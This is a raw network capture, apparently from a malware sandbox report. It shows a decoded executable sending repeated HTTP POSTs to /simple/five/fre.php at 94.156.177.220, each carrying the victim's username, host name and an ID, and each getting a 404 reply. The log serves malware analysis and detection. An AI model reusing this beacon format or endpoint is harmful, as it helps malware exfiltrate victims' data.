Oct 25, 2024 10:21:14.957762003 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:15.914707899 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49894	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:16.544763088 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:16.552284956 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:17.523474932 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49900	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:17.689528942 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:17.694981098 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:18.678745985 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49910	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:19.199512005 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:19.204894066 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:20.169209957 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49917	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:20.320362091 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:20.326056957 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:21.278759003 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49924	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:21.435635090 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:21.441410065 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:22.428572893 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49934	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:22.902010918 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:22.907366037 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:23.917716026 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49940	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:24.067897081 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:24.073734999 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:25.059734106 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49947	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:25.569238901 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:25.575978041 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:26.544379950 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49954	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:26.699541092 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:26.705064058 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:27.664477110 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49963	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:27.821489096 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:27.827106953 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:28.795599937 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49969	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:28.945952892 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:28.952301979 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:29.966038942 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49975	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:30.114675045 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:30.120093107 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:31.093755960 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49985	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:31.238934994 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:31.244678974 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:32.205862999 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49991	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:32.346360922 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:32.352236032 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:33.334688902 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49998	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:33.489151001 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:33.496323109 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:34.472930908 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50005	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:34.644509077 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:34.650471926 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:35.623763084 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50014	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:35.776802063 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:35.782291889 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:36.765660048 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50021	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:36.916836023 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:36.922599077 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:37.889924049 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50027	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:38.065571070 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:38.071599007 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:39.040096045 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
